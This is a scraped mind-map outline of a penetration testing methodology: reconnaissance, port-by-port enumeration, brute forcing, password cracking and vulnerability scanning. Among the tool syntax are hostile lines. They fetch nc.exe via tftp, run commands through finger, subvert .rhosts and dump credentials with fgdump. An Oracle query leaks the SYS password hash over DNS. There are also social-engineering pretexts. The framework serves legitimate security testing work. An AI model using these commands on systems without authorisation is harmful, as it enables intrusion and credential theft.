Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1 cmd.exe

1.1.2. 2 echo off command echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. alternative functionality objShell.Run "%comspec% /k c: & dir" objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt" objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool Reconnaissance FileSystem Links Common Dialogs Application Handlers Browser Plugins iKAT Tools

1.4. AT Command - priviledge escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k

1.4.3. Untitled

1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10) Save Image As View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB


2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication Method Xauth Xhost

3.2. X11 Exploitation

3.2.1. xwd xwd -display -root -out

3.2.2. Keystrokes Received Transmitted

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm Untitled

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config DisplayManager*authorize:on

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt


13. Pre-Inspection Visit - template

14. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

14.1. Untitled

14.1.1. Authoratitive Bodies IANA - Internet Assigned Numbers Authority ICANN - Internet Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry AFRINIC - African Network Information Centre APNIC - Asia Pacific Network Information Centre ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre

14.1.2. Websites Central Ops Domain Dossier Email Dossier DNS Stuff Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries. Fixed Orbit Autonomous System lookups and other online tools available. Geektools IP2Location Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information. Kartoo Metasearch engine that visually presents its results. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution Excellent site that can be used if the above is down Netcraft Online search tool allowing queries for host information. Passive DNS Replication Finds shared domains based on supplied IP addresses Note: - Website utilised by nmap hostmap.nse script Robtex Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify) Website listing a large number links to online traceroute resources. Wayback Machine Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

14.1.3. Tools Cheops-ng Country whois Domain Research Tool Firefox Plugins AS Number Shazou Firecat Suite Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot

14.2. Internet Search

14.2.1. General Information Web Investigator Tracesmart Friends Reunited Ebay - profiles etc.

14.2.2. Financial EDGAR - Company information, including real-time filings. US Google Finance - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK

14.2.3. Phone book/ Electoral Role Information 123people Electoral Role Search. UK 411 Online White Pages and Yellow Pages. US Untitled Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US UK Residential Business Pipl Untitled Spokeo Yasni Zabasearch People Search Engine. US

14.2.4. Generic Web Searching Code Search Forum Entries Google Hacking Database Google Email Addresses Contact Details Newsgroups/forums Blog Search Yammer Google Blog Search Technorati Jaiku Twitter Network Browser Search Engine Comparison/ Aggregator Sites Clusty Grokker Zuula Exalead Delicious

14.2.5. Metadata Search Untitled MetaData Visualisation Sites Tools Wikipedia Metadata Search

14.2.6. Social/ Business Networks Untitled Africa Australia Belgium Holland Hungary Iran Japan Korea Poland Russia Sweden UK US Assorted

14.2.7. Resources OSINT International Directory of Search Engines

14.3. DNS Record Retrieval from publically available servers

14.3.1. Types of Information Records SOA Records - Indicates the server that has authority for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host information record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain.

14.3.2. Database Settings Version.bind Serial Refresh Retry Expiry Minimum

14.3.3. Sub Domains

14.3.4. Internal IP ranges Reverse DNS for IP Range

14.3.5. Zone Transfer

14.4. Social Engineering

14.4.1. Remote Phone Scenarios Results Contact Details Email Scenarios Software Results Contact Details Other

14.4.2. Local Personas Name Phone Email Business Cards Contact Details Name Phone number Email Room number Department Role Scenarios New IT employee Fire Inspector Results Maps Satalitte Imagery Building layouts Other

14.5. Dumpster Diving

14.5.1. Rubbish Bins

14.5.2. Contract Waste Removal

14.5.3. Ebay ex-stock sales i.e. HDD

14.6. Web Site copy

14.6.1. htttrack

14.6.2. teleport pro

14.6.3. Black Widow

15. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

15.1. Default Port Lists

15.1.1. Windows

15.1.2. *nix

15.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

15.2.1. General Enumeration Tools nmap nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results nmap -A -sS -PN -n --script:all ip_address --reason grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list netcat nc -v -n IP_Address port nc -v -w 2 -z IP_Address port_range/port_number amap amap -bqv 80 amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...] xprobe2 xprobe2 sinfp ./ -i -p nbtscan nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>) hping hping ip_address scanrand scanrand ip_address:all unicornscan unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E netenum netenum network/netmask timeout fping fping -a -d hostname/ (Network/Subnet_Mask)

15.2.2. Firewall Specific Tools firewalk firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP] ftester host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

15.2.3. Default Passwords (Examine list) Passwords A Passwords B Passwords C Passwords D Passwords E Passwords F Passwords G Passwords H Passwords I Passwords J Passwords K Passwords L Passwords M Passwords N Passwords O Passwords P Passwords R Passwords S Passwords T Passwords U Passwords V Passwords W Passwords X Passwords Y Passwords Z Passwords (Numeric)

15.3. Active Hosts

15.3.1. Open TCP Ports

15.3.2. Closed TCP Ports

15.3.3. Open UDP Ports

15.3.4. Closed UDP Ports

15.3.5. Service Probing SMTP Mail Bouncing Banner Grabbing Other HTTP HTTPS SMTP POP3 FTP

15.3.6. ICMP Responses Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Request) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address

15.3.7. Source Port Scans TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos)

15.3.8. Firewall Assessment Firewalk TCP/UDP/ICMP responses

15.3.9. OS Fingerprint

16. Enumeration

16.1. Daytime port 13 open

16.1.1. nmap nse script daytime

16.2. FTP port 21 open

16.2.1. Fingerprint server telnet ip_address 21 (Banner grab) Run command ftp ip_address [email protected] Check for anonymous access ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

16.2.2. Password guessing Hydra brute force medusa Brutus

16.2.3. Examine configuration files ftpusers ftp.conf proftpd.conf

16.2.4. MiTM

16.3. SSH port 22 open

16.3.1. Fingerprint server telnet ip_address 22 (banner grab) scanssh scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

16.3.2. Password guessing ssh [email protected]_address guess-who ./b -l username -h ip_address -p 22 -2 < password_file_location Hydra brute force brutessh Ruby SSH Bruteforcer

16.3.3. Examine configuration files ssh_config sshd_config authorized_keys ssh_known_hosts .shosts

16.3.4. SSH Client programs tunnelier winsshd putty winscp

16.4. Telnet port 23 open

16.4.1. Fingerprint server telnet ip_address Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster telnetfp

16.4.2. Password Attack Untitled Brutus Hydra brute force telnet -l "-froot" hostname (Solaris 10+)

16.4.3. Examine configuration files /etc/xinetd.d/telnet /etc/xinetd.d/stelnet

16.5. Sendmail Port 25 open

16.5.1. Fingerprint server telnet ip_address 25 (banner grab)

16.5.2. Mail Server Testing Enumerate users VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts) Mail Spoof Test HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT /etc/inetd.conf Mail Relay Test Untitled

16.5.3. Examine Configuration Files

16.6. DNS port 53 open

16.6.1. Fingerprint server/ service host host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename. nslookup nslookup [ -option ... ] [ host-to-find | - [ server ]] dig dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ] whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

16.6.2. DNS Enumeration Bile Suite perl [website] [project_name] perl [website] [input file] perl [input file] [true domain file] [output file] <range> perl [input file] [true domain file] [output file] perl [input file] [output file] perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names] perl jarf-rev [subnetblock] [nameserver] txdns txdns -rt -t domain_name txdns -x 50 -bb domain_name nmap nse scripts dns-random-srcport dns-random-txid dns-recursion dns-zone-transfer

16.6.3. Examine Configuration Files host.conf resolv.conf named.conf

16.7. perl [ip_address_file] [output_file]

16.8. TFTP port 69 open

16.8.1. TFTP Enumeration tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i <IP> GET /etc/passwd (old Solaris)

16.8.2. TFTP Bruteforcing TFTP bruteforcer Cisco-Torch

16.9. Finger Port 79 open

16.9.1. User enumeration finger 'a b c d e f g h' finger [email protected] finger [email protected] finger [email protected] finger [email protected] finger ** finger [email protected] finger nmap nse script finger

16.9.2. Command execution finger "|/bin/[email protected]" finger "|/bin/ls -a /"

16.9.3. Finger Bounce finger [email protected]@victim finger @[email protected]

16.10. Web Ports 80,8080 etc. open

16.10.1. Fingerprint server Telnet ip_address port Firefox plugins All Specific

16.10.2. Crawl website lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil -d [domain] -l [no. of] -f [type] -o results.html

16.10.3. Web Directory enumeration Nikto nikto [-h target] [options] DirBuster Wikto Goolag Scanner

16.10.4. Vulnerability Assessment Manual Tests Default Passwords Install Backdoors Method Testing Upload Files View Page Source Input Validation Checks Automated table and column iteration Vulnerability Scanners Acunetix Grendelscan NStealth Obiwan III w3af Specific Applications/ Server Tools Domino Joomla Vbulletin ZyXel

16.10.5. Proxy Testing Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab

16.10.6. Examine configuration files Generic Examine httpd.conf/ windows config files JBoss JMX Console http://<IP>:8080/jmxconcole/ Joomla configuration.php diagnostics.php Mambo configuration.php Wordpress setup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups

16.10.7. Examine web server logs c:\winnt\system32\Logfiles\W3SVC1 awk -F " " '{print $3,$11} filename | sort | uniq

16.10.8. References White Papers Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet Books Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker's Handbook

16.10.9. Exploit Frameworks Brute-force Tools Acunetix Metasploit w3af

16.11. Portmapper port 111 open

16.11.1. username:[email protected]_Address port/protocol (i.e. 80/HTTP)

16.11.2. rpcinfo rpcinfo [options] IP_Address

16.12. NTP Port 123 open

16.12.1. NTP Enumeration ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq host hostname ntpversion readlist version

16.12.2. Examine configuration files ntp.conf

16.12.3. nmap nse script ntp-info

16.13. NetBIOS Ports 135-139,445 open

16.13.1. NetBIOS enumeration Enum enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip> Null Session net use \\\ipc$ "" /u:"" Smbclient smbclient -L //server/share password options Superscan Enumeration tab. user2sid/sid2user Winfo

16.13.2. NetBIOS brute force Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)

16.13.3. Examine Configuration Files Smb.conf lmhosts

16.14. SNMP port 161 open

16.14.1. Default Community Strings public private cisco cable-docsis ILMI

16.14.2. MIB enumeration Windows NT . Hostnames . Domain Name . Usernames . Running Services . Share Information Solarwinds MIB walk Getif snmpwalk snmpwalk -v <Version> -c <Community string> <IP> Snscan Applications ZyXel nmap nse script snmp-sysdescr

16.14.3. SNMP Bruteforce onesixtyone onesixytone -c SNMP.wordlist <IP> cat ./cat -h <IP> -w SNMP.wordlist Solarwinds SNMP Brute Force ADMsnmp nmap nse script snmp-brute

16.14.4. Examine SNMP Configuration files snmp.conf snmpd.conf snmp-config.xml

16.15. LDAP Port 389 Open

16.15.1. ldap enumeration ldapminer ldapminer -h ip_address -p port (not required if default) -d luma Gui based tool ldp Gui based tool openldap ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...] ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

16.15.2. ldap brute force bf_ldap bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,) K0ldS

16.15.3. Examine Configuration Files General containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf IBM SecureWay V3 server Microsoft Active Directory server msadClassesAttrs.ldif Netscape Directory Server 4 nsslapd.sas_at.conf nsslapd.sas_oc.conf OpenLDAP directory server slapd.sas_at.conf slapd.sas_oc.conf Sun ONE Directory Server 5.1 75sas.ldif

16.16. PPTP/L2TP/VPN port 500/1723 open

16.16.1. Enumeration ike-scan ike-probe

16.16.2. Brute-Force ike-crack

16.16.3. Reference Material PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation

16.17. Modbus port 502 open

16.17.1. modscan

16.18. rlogin port 513 open

16.18.1. Rlogin Enumeration Find the files find / -name .rhosts locate .rhosts Examine Files cat .rhosts Manual Login rlogin hostname -l username rlogin <IP> Subvert the files echo ++ > .rhosts

16.18.2. Rlogin Brute force Hydra

16.19. rsh port 514 open

16.19.1. Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

16.19.2. Rsh Brute Force rsh-grind Hydra medusa

16.20. SQL Server Port 1433 1434 open

16.20.1. SQL Enumeration piggy SQLPing sqlping ip_address/hostname SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver

16.20.2. SQL Brute Force SQLPAT sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c -r out.rep - Brute-Force Attack SQL Dict SQLAT Hydra SQLlhf ForceSQL

16.21. Citrix port 1494 open

16.21.1. Citrix Enumeration Default Domain Published Applications ./citrix-pa-scan {IP_address/file | - | random} [timeout] IP_to_proxy_to [Local_IP]

16.21.2. Citrix Brute Force bforce.js connect.js Citrix Brute-forcer Reference Material Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way

16.22. Oracle Port 1521 Open

16.22.1. Oracle Enumeration oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'') FROM DUAL Untitled WinSID Oracle default password list TNSVer tnsver host [port] TCP Scan Oracle TNSLSNR Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop] TNSCmd perl -h ip_address perl version -h ip_address perl status -h ip_address perl -h ip_address --cmdsize (40 - 200) LSNrCheck Oracle Security Check (needs credentials) OAT sh -s ip_address opwg.bat -s ip_address sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID OScanner sh -s ip_address oscanner.exe -s ip_address sh oscanner_saved_file.xml reportviewer.exe oscanner_saved_file.xml NGS Squirrel for Oracle Service Register Service-register.exe ip_address PLSQL Scanner 2008

16.22.2. Oracle Brute Force OAK ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid username password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port breakable (Targets Application Server Port) breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose SQLInjector (Targets Application Server Port) sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle Check Password orabf orabf [hash]:[username] [options] thc-orakel Cracker Client Crypto DBVisualisor Sql scripts from Manual sql input of previously reported vulnerabilties

16.22.3. Oracle Reference Material Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets Untitled

16.23. NFS Port 2049 open

16.23.1. NFS Enumeration showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point

16.23.2. NFS Brute Force Interact with NFS share and try to add/delete Exploit and Confuse Unix

16.23.3. Examine Configuration Files /etc/exports /etc/lib/nfs/xtab

16.23.4. nmap nse script nfs-showmount

16.24. Compaq/HP Insight Manager Port 2301,2381open

16.24.1. HP Enumeration Authentication Method Host OS Authentication Default Authentication Wikto Nstealth

16.24.2. HP Bruteforce Hydra Acunetix

16.24.3. Examine Configuration Files mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc

16.25. MySQL port 3306 open

16.25.1. Enumeration nmap -A -n -p3306 <IP Address> nmap -A -n -PN --script:ALL -p3306 <IP Address> telnet IP_Address 3306 use test; select * from test; To check for other DB's -- show databases

16.25.2. Administration MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog

16.25.3. Manual Checks Default usernames and passwords username: root password: testing Configuration Files Operating System Command History Log Files To run many sql commands at once -- mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf) SSL Check Privilege Escalation Current Level of access Access passwords Create a new user and grant him privileges Break into a shell

16.25.4. SQL injection http://target/ expected_string database

16.25.5. References. Design Weaknesses MySQL running as root Exposed publicly on Internet

16.26. RDesktop port 3389 open

16.26.1. Rdesktop Enumeration Remote Desktop Connection

16.26.2. Rdestop Bruteforce TSGrinder tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address Tscrack

16.27. Sybase Port 5000+ open

16.27.1. Sybase Enumeration sybase-version ip_address from NGS

16.27.2. Sybase Vulnerability Assessment Use DBVisualiser Sybase Security checksheet Manual sql input of previously reported vulnerabilties NGS Squirrel for Sybase

16.28. SIP Port 5060 open

16.28.1. SIP Enumeration netcat nc IP_Address Port sipflanker python 192.168.1-254 Sipscan smap smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

16.28.2. SIP Packet Crafting etc. sipsak Tracing paths: - sipsak -T -s sip:[email protected] Options request:- sipsak -vv -s sip:[email protected] Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected] siprogue

16.28.3. SIP Vulnerability Scanning/ Brute Force tftp bruteforcer Default dictionary file ./ IP_Address Dictionary_file Maximum_Processes VoIPaudit SiVuS

16.28.4. Examine Configuration Files SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf <Ethernet address>.cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc.

16.29. VNC port 5900^ open

16.29.1. VNC Enumeration Scans 5900^ for direct access.5800 for HTTP access.

16.29.2. VNC Brute Force Password Attacks Remote Local

16.29.3. Exmine Configuration Files .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf

16.30. Tor Port 9001, 9030 open

16.30.1. Tor Node Checker Ip Pages

16.30.2. nmap NSE script

16.31. Jet Direct 9100 open

16.31.1. hijetta

17. Password cracking

17.1. Rainbow crack

17.1.1. ophcrack

17.1.2. rainbow tables rcrack c:\rainbowcrack\*.rt -f pwfile.txt

17.2. Ophcrack

17.3. Cain & Abel

17.4. John the Ripper

17.4.1. ./unshadow passwd shadow > file_to_crack

17.4.2. ./john -single file_to_crack

17.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

17.4.4. ./john -show file_to_crack

17.4.5. ./john --incremental:All file_to_crack

17.5. fgdump

17.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

17.6. pwdump6

17.7. medusa

17.8. LCP

17.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

17.9.1. Domain credentials

17.9.2. Sniffing

17.9.3. pwdump import

17.9.4. sam import

17.10. aiocracker

17.10.1. [md5, sha1, sha256, sha384, sha512] hash dictionary_list

18. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

18.1. Manual

18.1.1. Patch Levels

18.1.2. Confirmed Vulnerabilities Severe High Medium Low

18.2. Automated

18.2.1. Reports

18.2.2. Vulnerabilities Severe High Medium Low

18.3. Tools

18.3.1. GFI

18.3.2. Nessus (Linux) Nessus (Windows)

18.3.3. NGS Typhon

18.3.4. NGS Squirrel for Oracle

18.3.5. NGS Squirrel for SQL

18.3.6. SARA

18.3.7. MatriXay

18.3.8. BiDiBlah

18.3.9. SSA

18.3.10. Oval Interpreter

18.3.11. Xscan

18.3.12. Security Manager +

18.3.13. Inguma

18.4. Resources

18.4.1. Security Focus

18.4.2. Microsoft Security Bulletin

18.4.3. Common Vulnerabilities and Exploits (CVE)

18.4.4. National Vulnerability Database (NVD)

18.4.5. The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL

18.4.6. United States Computer Emergency Response Team (US-CERT)

18.4.7. Computer Emergency Response Team

18.4.8. Mozilla Security Information

18.4.9. SANS

18.4.10. Securiteam

18.4.11. PacketStorm Security

18.4.12. Security Tracker

18.4.13. Secunia


18.4.15. ntbugtraq

18.4.16. Wireless Vulnerabilities and Exploits (WVE)

18.5. Blogs

18.5.1. Carnal0wnage

18.5.2. Fsecure Blog

18.5.3. g0ne blog

18.5.4. GNUCitizen

18.5.5. ha.ckers Blog

18.5.6. Jeremiah Grossman Blog

18.5.7. Metasploit

18.5.8. nCircle Blogs

18.5.9. pentest

18.5.10. Rational Security

18.5.11. Rise Security

18.5.12. Security Fix Blog

18.5.13. Software Vulnerability Exploitation Blog

18.5.14. Taosecurity Blog

19. AS/400 Auditing

19.1. Remote

